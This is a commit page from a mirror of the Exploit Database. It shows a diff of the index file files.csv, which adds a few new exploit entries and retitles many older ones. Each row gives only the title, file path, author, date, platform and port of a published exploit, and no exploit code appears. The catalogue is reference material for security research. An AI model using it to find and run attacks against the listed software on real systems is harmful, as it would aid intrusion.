bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-12-07

Browse source 
9 new exploits

MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)
Asterisk - (SIP channel driver / in pedantic mode) Remote Crash
Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)
Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash

F5 BIG-IP - Remote Root Authentication Bypass (1)
F5 BIG-IP - Authentication Bypass (1)

Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow
NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow

NetCat 0.7.1 - Denial of Service
Microsoft Event Viewer 1.0 - XML External Entity Injection
Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection
Apache CouchDB 2.0.0 - Local Privilege Escalation

Samba 2.2.8 - Remote Root Exploit
Samba 2.2.8 - Remote Code Execution

Microsoft Windows - WebDAV Remote Root Exploit (2)
Microsoft Windows - WebDAV Remote Code Execution (2)

Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav)
Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)

miniSQL (mSQL) 1.3 - Remote GID Root Exploit
miniSQL (mSQL) 1.3 - GID Remote Code Execution
Real Server 7/8/9 (Windows / Linux) - Remote Root Exploit
GtkFtpd 1.0.4 - Remote Root Buffer Overflow
Real Server 7/8/9 (Windows / Linux) - Remote Code Execution
GtkFtpd 1.0.4 - Buffer Overflow
Solaris Sadmind - Default Configuration Remote Root Exploit
Knox Arkeia Pro 5.1.12 - Backup Remote Root Exploit
Solaris Sadmind - Default Configuration Remote Code Execution
Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution

ProFTPd 1.2.9rc2 - ASCII File Remote Root Exploit
ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution

ProFTPd 1.2.7 < 1.2.9rc2 - Remote Root / Brute Force Exploit
ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force

Cyrus IMSPD 1.7 - abook_dbname Remote Root Exploit
Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution

Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit
Ethereal 0.10.0 < 0.10.2 - IGAP Overflow
Monit 4.1 - Remote Root Buffer Overflow
Monit 4.2 - Remote Root Buffer Overflow
Monit 4.1 - Buffer Overflow
Monit 4.2 - Buffer Overflow

INND/NNRP < 1.6.x - Remote Root Overflow
INND/NNRP < 1.6.x - Overflow Exploit

LPRng (RedHat 7.0) - lpd Remote Root Format String
LPRng (RedHat 7.0) - 'lpd' Format String

BeroFTPD 1.3.4(1) (Linux/x86) - Remote Root Exploit
BeroFTPD 1.3.4(1) (Linux/x86) - Remote Code Execution
BIND 8.2.x - (TSIG) Remote Root Stack Overflow (1)
BIND 8.2.x - (TSIG) Remote Root Stack Overflow (2)
BIND 8.2.x - (TSIG) Remote Root Stack Overflow (3)
BIND 8.2.x - (TSIG) Remote Root Stack Overflow (4)
BIND 8.2.x - (TSIG) Stack Overflow (1)
BIND 8.2.x - (TSIG) Stack Overflow (2)
BIND 8.2.x - (TSIG) Stack Overflow (3)
BIND 8.2.x - (TSIG) Stack Overflow (4)

HP Web JetAdmin 6.5 - (connectedNodes.ovpl) Remote Root Exploit
HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution

CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow Root Exploit
CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow

Solaris /bin/login (SPARC/x86) - Remote Root Exploit
Solaris /bin/login (SPARC/x86) - Remote Code Execution

Drcat 0.5.0-beta - (drcatd) Remote Root Exploit
Drcat 0.5.0-beta - 'drcatd' Remote Code Execution

Dropbear SSH 0.34 - Remote Root Exploit
Dropbear SSH 0.34 - Remote Code Execution

Apple Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow
Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution

Monit 4.2 - Basic Authentication Remote Root Exploit
Monit 4.2 - Basic Authentication Remote Code Execution

WvTFTPd 0.9 - Remote Root Heap Overflow
WvTFTPd 0.9 - Heap Overflow

Qwik SMTP 0.3 - Remote Root Format String
Qwik SMTP 0.3 - Format String

Citadel/UX 6.27 - Remote Root Format String
Citadel/UX 6.27 - Format String

Knox Arkeia Server Backup 5.3.x - Remote Root Exploit
Knox Arkeia Server Backup 5.3.x - Remote Code Execution
Smail 3.2.0.120 - Remote Root Heap Overflow
mtftpd 0.0.3 - Remote Root Exploit
Smail 3.2.0.120 -  Heap Overflow
mtftpd 0.0.3 - Remote Code Execution

dSMTP Mail Server 3.1b - Linux Remote Root Format String
dSMTP Mail Server 3.1b (Linux) - Format String Exploit

IPSwitch IMail Server 8.15 - IMAPD Remote Root Exploit
IPSwitch IMail Server 8.15 - IMAPD Remote Code Execution

linux-ftpd-ssl 0.17 - (MKD/CWD) Remote Root Exploit
linux-ftpd-ssl 0.17 - 'MKD'/'CWD' Remote Code Execution

MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow
Alt-N MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow

GNU InetUtils ftpd 1.4.2 - (ld.so.preload) Remote Root Exploit
GNU InetUtils ftpd 1.4.2 - 'ld.so.preload' Remote Code Execution

ProFTPd 1.2.9 rc2 - (ASCII File) Remote Root Exploit
ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution

dproxy-nexgen (Linux/x86) - Remote Root Buffer Overflow
dproxy-nexgen (Linux/x86) - Buffer Overflow

Kerberos 1.5.1 - Kadmind Remote Root Buffer Overflow
Kerberos 1.5.1 - Kadmind Buffer Overflow

webdesproxy 0.0.1 - GET Request Remote Root Exploit (exec-shield)
webdesproxy 0.0.1 - (exec-shield) GET Request Remote Code Execution

VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Root Exploit
VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution

MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow
Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow

Sun Solaris 10 - rpc.ypupdated Remote Root Exploit
Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution

ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Root Exploit
ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution

Sun Solaris 10 - rpc.ypupdated Remote Root Exploit (Metasploit)
Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)

Trixbox 2.6.1 - (langChoice) Remote Root Exploit (Python)
Trixbox 2.6.1 - (langChoice) Remote Code Execution (Python)

Solaris 9 (UltraSPARC) - sadmind Remote Root Exploit
Solaris 9 (UltraSPARC) - sadmind Remote Code Execution

Apache SpamAssassin Milter Plugin 0.3.1 - Remote Root Command Execution
Apache SpamAssassin Milter Plugin 0.3.1 - Remote Command Execution

Microworld eScan AntiVirus < 3.x - Remote Root Command Execution
Microworld eScan AntiVirus < 3.x - Remote Code Execution

AIX5l with FTP-Server - Remote Root Hash Disclosure
AIX5l with FTP-Server - Hash Disclosure

McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)
McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Remote Code Execution)

ProFTPd 1.3.3c - Compromised Source Remote Root Trojan
ProFTPd 1.3.3c - Compromised Source (Trojan) Remote Code Execution

Comtrend ADSL Router CT-5367 C01_R12 - Remote Root Exploit
Comtrend ADSL Router CT-5367 C01_R12 - Remote Code Execution

MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)
Alt-N MDaemon 9.6.4 - IMAPD FETCH Buffer Overflow (Metasploit)

ACTi ASOC 2200 Web Configurator 2.6 - Remote Root Command Execution
ACTi ASOC 2200 Web Configurator 2.6 - Remote Command Execution

DreamBox DM800 1.5rc1 - Remote Root File Disclosure
DreamBox DM800 1.5rc1 - File Disclosure

TelnetD encrypt_keyid - Remote Root Function Pointer Overwrite
TelnetD encrypt_keyid - Function Pointer Overwrite
F5 BIG-IP - Remote Root Authentication Bypass (2)
MySQL - Remote Root Authentication Bypass
F5 BIG-IP - Authentication Bypass (2)
MySQL - Authentication Bypass

ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection
ManageEngine Security Manager Plus 5.5 build 5505 - Remote Root/SYSTEM SQL Injection

WIDZ 1.0/1.5 - Remote Root Compromise
WIDZ 1.0/1.5 - Remote Code Execution
Shuttle Tech ADSL Wireless 920 WM - Multiple Vulnerabilities
Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)
DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow

proManager 0.73 - (note.php) SQL Injection
ProManager 0.73 - 'note.php' SQL Injection

pNews 1.1.0 - (nbs) Remote File Inclusion
pNews 1.1.0 - 'nbs' Parameter Remote File Inclusion

Power Phlogger 2.0.9 - (config.inc.php3) File Inclusion
Power Phlogger 2.0.9 - 'config.inc.php3' File Inclusion

eFiction 3.1.1 - (path_to_smf) Remote File Inclusion
eFiction 3.1.1 - 'path_to_smf' Remote File Inclusion

FlexPHPNews 0.0.5 - (news.php newsid) SQL Injection
FlexPHPNews 0.0.5 - 'newsid' Parameter SQL Injection

Achievo 1.1.0 - (atk.inc config_atkroot) Remote File Inclusion
Achievo 1.1.0 - 'config_atkroot' Parameter Remote File Inclusion

SimpNews 2.40.01 - (print.php newnr) SQL Injection
SimpNews 2.40.01 - 'newnr' Parameter SQL Injection

PHPNews 0.93 - (format_menue) Remote File Inclusion
PHPNews 0.93 - 'format_menue' Parameter Remote File Inclusion

meBiblio 0.4.5 - (index.php action) Remote File Inclusion
meBiblio 0.4.5 - 'action' Parameter Remote File Inclusion

Joomla! Component rapidrecipe 1.6.5 - SQL Injection
Joomla! Component Rapid Recipe 1.6.5 - SQL Injection

mebiblio 0.4.7 - (SQL Injection / Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities
mebiblio 0.4.7 - SQL Injection / Arbitrary File Upload / Cross-Site Scripting
pLog - 'albumID' SQL Injection
smeweb 1.4b - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
PLog 1.0.6 - 'albumID' Parameter SQL Injection
smeweb 1.4b - SQL Injection / Cross-Site Scripting

Joomla! Component joomradio 1.0 - 'id' SQL Injection
Joomla! Component JoomRadio 1.0 - 'id' Parameter SQL Injection

Battle Blog 1.25 - (comment.asp) SQL Injection
Battle Blog 1.25 - 'comment.asp' SQL Injection

1Book Guestbook Script - Code Execution
1Book Guestbook Script 1.0.1 - Code Execution
PHP-Address Book 3.1.5 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
Joomla! Component EasyBook 1.1 - (gbid) SQL Injection
427bb 2.3.1 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
PHP-Address Book 3.1.5 - SQL Injection / Cross-Site Scripting
Joomla! Component EasyBook 1.1 - 'gbid' Parameter SQL Injection
427bb 2.3.1 - SQL Injection / Cross-Site Scripting
Power Phlogger 2.2.5 - (css_str) SQL Injection
pSys 0.7.0.a - (shownews) SQL Injection
Joomla! Component JoomlaDate - (user) SQL Injection
Power Phlogger 2.2.5 - 'css_str' Parameter SQL Injection
pSys 0.7.0.a - 'shownews' Parameter SQL Injection
Joomla! Component JoomlaDate 1.2 - 'user' Parameter SQL Injection
JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection
phpinv 0.8.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
Joomla! Component yvcomment 1.16 - Blind SQL Injection
JiRo's FAQ Manager eXperience 1.0 - 'fID' Parameter SQL Injection
phpinv 0.8.0 - Local File Inclusion / Cross-Site Scripting
Joomla! Component yvComment 1.16 - Blind SQL Injection

BrowserCRM 5.002.00 - (clients.php) Remote File Inclusion
BrowserCRM 5.002.00 - 'clients.php' Remote File Inclusion

Joomla! Component rapidrecipe - SQL Injection
Joomla! Component Rapid Recipe 1.6.6/1.6.7 - SQL Injection

Joomla! Component iJoomla! News Portal - 'itemID' SQL Injection
Joomla! Component iJoomla News Portal 1.0 - 'itemID' Parameter SQL Injection
real estate Web site 1.0 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
telephone directory 2008 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities
ASPilot Pilot Cart 7.3 - (article) SQL Injection
real estate Web site 1.0 - SQL Injection / Cross-Site Scripting
Telephone Directory 2008 - SQL Injection / Cross-Site Scripting
ASPilot Pilot Cart 7.3 - 'article' Parameter SQL Injection
Flux CMS 1.5.0 - (loadsave.php) Arbitrary File Overwrite
pNews 2.08 - (shownews) SQL Injection
Flux CMS 1.5.0 - 'loadsave.php' Arbitrary File Overwrite
pNews 2.08 - 'shownews' Parameter SQL Injection
ErfurtWiki R1.02b - (css) Local File Inclusion
DCFM Blog 0.9.4 - (comments) SQL Injection
yblog 0.2.2.2 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities
Insanely Simple Blog 0.5 - (index) SQL Injection
ASPPortal Free Version - 'Topic_Id' SQL Injection
Experts 1.0.0 - (answer.php) SQL Injection
SyndeoCMS 2.6.0 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities
ErfurtWiki R1.02b - Local File Inclusion
DCFM Blog 0.9.4 - SQL Injection
Yblog 0.2.2.2 - Cross-Site Scripting / SQL Injection
Insanely Simple Blog 0.5 - SQL Injection
ASPPortal Free Version - 'Topic_Id' Parameter SQL Injection
Experts 1.0.0 - 'answer.php' SQL Injection
SyndeoCMS 2.6.0 - Local File Inclusion / Cross-Site Scripting

Yuhhu 2008 SuperStar - 'board' SQL Injection
Yuhhu 2008 SuperStar - 'board' Parameter SQL Injection

eFiction 3.0 - (toplists.php list) SQL Injection
eFiction 3.0 - 'toplists.php' SQL Injection

pSys 0.7.0 Alpha - (chatbox.php) SQL Injection
pSys 0.7.0 Alpha - 'chatbox.php' SQL Injection

pNews 2.03 - (newsid) SQL Injection
pNews 2.03 - 'newsid' Parameter SQL Injection

Joomla! Component JooBlog 0.1.1 - (PostID) SQL Injection
Joomla! Component JooBlog 0.1.1 - 'PostID' Parameter SQL Injection

FlexPHPNews 0.0.6 & PRO - (Authentication Bypass) SQL Injection
FlexPHPNews 0.0.6 & PRO - Authentication Bypass

E-ShopSystem - (Authentication Bypass / SQL Injection) Multiple Vulnerabilities
E-ShopSystem - Authentication Bypass / SQL Injection

Battle Blog 1.25 - (uploadform.asp) Arbitrary File Upload
Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload

427BB Fourtwosevenbb 2.3.2 - SQL Injection
427BB 2.3.2 - SQL Injection

Joomla! Component 'com_joomradio' - SQL Injection
Joomla! Component JoomRadio 1.0 - SQL Injection

Joomla! Component 'com_elite_experts' - SQL Injection
Joomla! Component Elite Experts - SQL Injection

ASPilot Pilot Cart 7.3 - newsroom.asp SQL Injection
ASPilot Pilot Cart 7.3 - 'newsroom.asp' SQL Injection

Contrexx ShopSystem 2.2 SP3 (catId) - Blind SQL Injection
Contrexx ShopSystem 2.2 SP3 - 'catId' Parameter Blind SQL Injection

Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit
Comtrend Router CT-5624 - Root/Support Password Disclosure/Change Exploit

alt-n mdaemon free 12.5.4 - Persistent Cross-Site Scripting
Alt-N MDaemon free 12.5.4 - Persistent Cross-Site Scripting

SimpNews 2.0.1/2.13 - PATH_SIMPNEWS Remote File Inclusion
SimpNews 2.0.1/2.13 - 'path_simpnews' Parameter Remote File Inclusion

PHPNews 1.2.3/1.2.4 - auth.php Remote File Inclusion
PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion
PHPSysInfo 2.0/2.3 - 'index.php' sensor_program Parameter Cross-Site Scripting
PHPSysInfo 2.0/2.3 - system_footer.php Multiple Parameter Cross-Site Scripting
PHPSysInfo 2.0/2.3 - 'sensor_program' Parameter Cross-Site Scripting
PHPSysInfo 2.0/2.3 - 'system_footer.php' Cross-Site Scripting

Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure
Seowonintech Routers fw: 2.3.9 - File Disclosure

PHPNews 1.2.x - auth.php SQL Injection
PHPNews 1.2.x - 'auth.php' SQL Injection
efiction 1.0/1.1/2.0 - titles.php let Parameter Cross-Site Scripting
efiction 1.0/1.1/2.0 - titles.php let Parameter SQL Injection
efiction 1.0/1.1/2.0 - viewstory.php sid Parameter SQL Injection
efiction 1.0/1.1/2.0 - viewuser.php uid Parameter SQL Injection
efiction 1.0/1.1/2.0 - 'titles.php' Cross-Site Scripting
efiction 1.0/1.1/2.0 - 'titles.php' SQL Injection
efiction 1.0/1.1/2.0 - 'sid' Parameter SQL Injection
efiction 1.0/1.1/2.0 - 'uid' Parameter SQL Injection

427BB 2.2 - showthread.php SQL Injection
427BB 2.2 - 'showthread.php' SQL Injection

BrowserCRM - results.php Cross-Site Scripting

Simpnews 2.x - Wap_short_news.php Remote File Inclusion
Simpnews 2.x - 'Wap_short_news.php' Remote File Inclusion

ZYXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting
ZYXEL Prestige 660H-61 ADSL Router - Cross-Site Scripting
Yblog - funk.php id Parameter Cross-Site Scripting
Yblog - tem.php action Parameter Cross-Site Scripting
Yblog - uss.php action Parameter Cross-Site Scripting
Yblog - 'funk.php' Cross-Site Scripting
Yblog - 'tem.php' Cross-Site Scripting
Yblog - 'uss.php' Cross-Site Scripting
Simpnews 2.x - admin/index.php Unspecified Cross-Site Scripting
Simpnews 2.x - admin/pwlost.php Unspecified Cross-Site Scripting
Simpnews 2.x - 'index.php' Cross-Site Scripting
Simpnews 2.x - 'pwlost.php' Cross-Site Scripting

PHPNews 1.3 - Link_Temp.php Multiple Cross-Site Scripting Vulnerabilities
PHPNews 1.3 - 'Link_Temp.php' Cross-Site Scripting
Insanely Simple Blog 0.4/0.5 - 'index.php' current_subsection Parameter SQL Injection
Insanely Simple Blog 0.4/0.5 - Blog Anonymous Blog Entry Cross-Site Scripting
Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection
Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting
SimpNews 2.41.3 - admin/layout2b.php l_username Parameter Cross-Site Scripting
SimpNews 2.41.3 - comment.php backurl Parameter Cross-Site Scripting
SimpNews 2.41.3 - 'l_username' Parameter Cross-Site Scripting
SimpNews 2.41.3 - 'backurl' Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - modules/Documents/version_list.php parent_id Parameter SQL Injection
BrowserCRM 5.100.1 - modules/Documents/index.php contact_id Parameter SQL Injection
BrowserCRM 5.100.1 - Multiple Script URI Cross-Site Scripting
BrowserCRM 5.100.1 - license/index.php framed Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - licence/view.php framed Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - pub/clients.php login[] Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - 'index.php' login[] Parameter Cross-Site Scripting
BrowserCRM 5.100.1 - 'parent_id' Parameter SQL Injection
BrowserCRM 5.100.1 - 'contact_id' Parameter SQL Injection
BrowserCRM 5.100.1 - URI Cross-Site Scripting
BrowserCRM 5.100.1 - 'framed' Parameter Cross-Site Scripting
Wordpress Plugin Single Personal Message 1.0.3 - SQL Injection
BrowserCRM 5.100.1 - 'clients.php' Cross-Site Scripting
BrowserCRM 5.100.1 - 'login[]' Cross-Site Scripting
This commit is contained in:
Offensive Security 2016-12-07 05:01:17 +00:00
parent 5dc941e36b
commit 855e59f932
14 changed files with 816 additions and 172 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

314
files.csv
View file

@ -737,8 +737,8 @@ id,file,description,date,author,platform,type,port
5709,platforms/windows/dos/5709.pl,"freeSSHd 1.2.1 - Remote Stack Overflow PoC Authenticated",2008-05-31,securfrog,windows,dos,0
5712,platforms/multiple/dos/5712.pl,"Samba 3.0.29 (client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",multiple,dos,0
5718,platforms/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5727,platforms/windows/dos/5727.pl,"MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
5749,platforms/multiple/dos/5749.pl,"Asterisk - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
5727,platforms/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflow (PoC)",2008-06-02,securfrog,windows,dos,0
5749,platforms/multiple/dos/5749.pl,"Asterisk 1.2.x - (SIP channel driver / in pedantic mode) Remote Crash",2008-06-05,"Armando Oliveira",multiple,dos,0
5814,platforms/linux/dos/5814.pl,"vsftpd 2.0.5 - (CWD) Authenticated Remote Memory Consumption Exploit",2008-06-14,"Praveen Darshanam",linux,dos,0
5817,platforms/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,windows,dos,0
5843,platforms/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,windows,dos,0
@ -2221,7 +2221,7 @@ id,file,description,date,author,platform,type,port
19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash Exploit",1993-02-03,anonymous,aix,dos,0
19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0
19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0
19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Remote Root Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0
19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0
19075,platforms/linux/dos/19075.c,"APC PowerChute Plus 4.2.2 - Denial of Service",1998-04-10,Schlossnagle,linux,dos,0
19080,platforms/linux/dos/19080.txt,"Debian suidmanager 0.18 - Exploit",1998-04-28,"Thomas Roessler",linux,dos,0
19082,platforms/linux/dos/19082.txt,"AMD K6 Processor - Exploit",1998-06-01,Poulot-Cazajous,linux,dos,0
@ -4984,7 +4984,7 @@ id,file,description,date,author,platform,type,port
39430,platforms/windows/dos/39430.txt,"Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2)",2016-02-09,"Francis Provencher",windows,dos,0
39431,platforms/windows/dos/39431.txt,"Adobe Photoshop CC & Bridge CC - '.iff' File Parsing Memory Corruption",2016-02-09,"Francis Provencher",windows,dos,0
39444,platforms/windows/dos/39444.txt,"Alternate Pic View 2.150 - '.pgm' Crash (PoC)",2016-02-15,"Shantanu Khandelwal",windows,dos,0
39445,platforms/linux/dos/39445.c,"Ntpd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
39445,platforms/linux/dos/39445.c,"NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow",2016-02-15,"Marcin Kozlowski",linux,dos,0
39447,platforms/windows/dos/39447.py,"Network Scanner 4.0.0.0 - SEH Crash (PoC)",2016-02-15,INSECT.B,windows,dos,0
39452,platforms/windows/dos/39452.txt,"CyberCop Scanner Smbgrind 5.5 - Buffer Overflow",2016-02-16,hyp3rlinx,windows,dos,0
39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack Based Buffer Overflow (1)",2016-02-16,"Google Security Research",linux,dos,0
@ -5287,6 +5287,7 @@ id,file,description,date,author,platform,type,port
40843,platforms/windows/dos/40843.html,"Microsoft Internet Explorer 11 - MSHTML 'CGenerated­Content::Has­Generated­SVGMarker' Type Confusion",2016-11-28,Skylined,windows,dos,0
40844,platforms/windows/dos/40844.html,"Microsoft Internet Explorer 10 - MSHTML 'CEdit­Adorner::Detach' Use-After-Free (MS13-047)",2016-11-28,Skylined,windows,dos,0
40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
40866,platforms/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8673,12 +8674,15 @@ id,file,description,date,author,platform,type,port
40859,platforms/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
40860,platforms/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Code Execution",2003-04-10,eSDee,linux,remote,139
16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
@ -8692,7 +8696,7 @@ id,file,description,date,author,platform,type,port
30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote,0
33,platforms/linux/remote/33.c,"WsMp3d 0.x - Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000
34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80
36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,windows,remote,80
37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69
@ -8704,13 +8708,13 @@ id,file,description,date,author,platform,type,port
48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25
50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21
55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139
56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Exploit",2003-07-14,anonymous,windows,remote,80
57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0
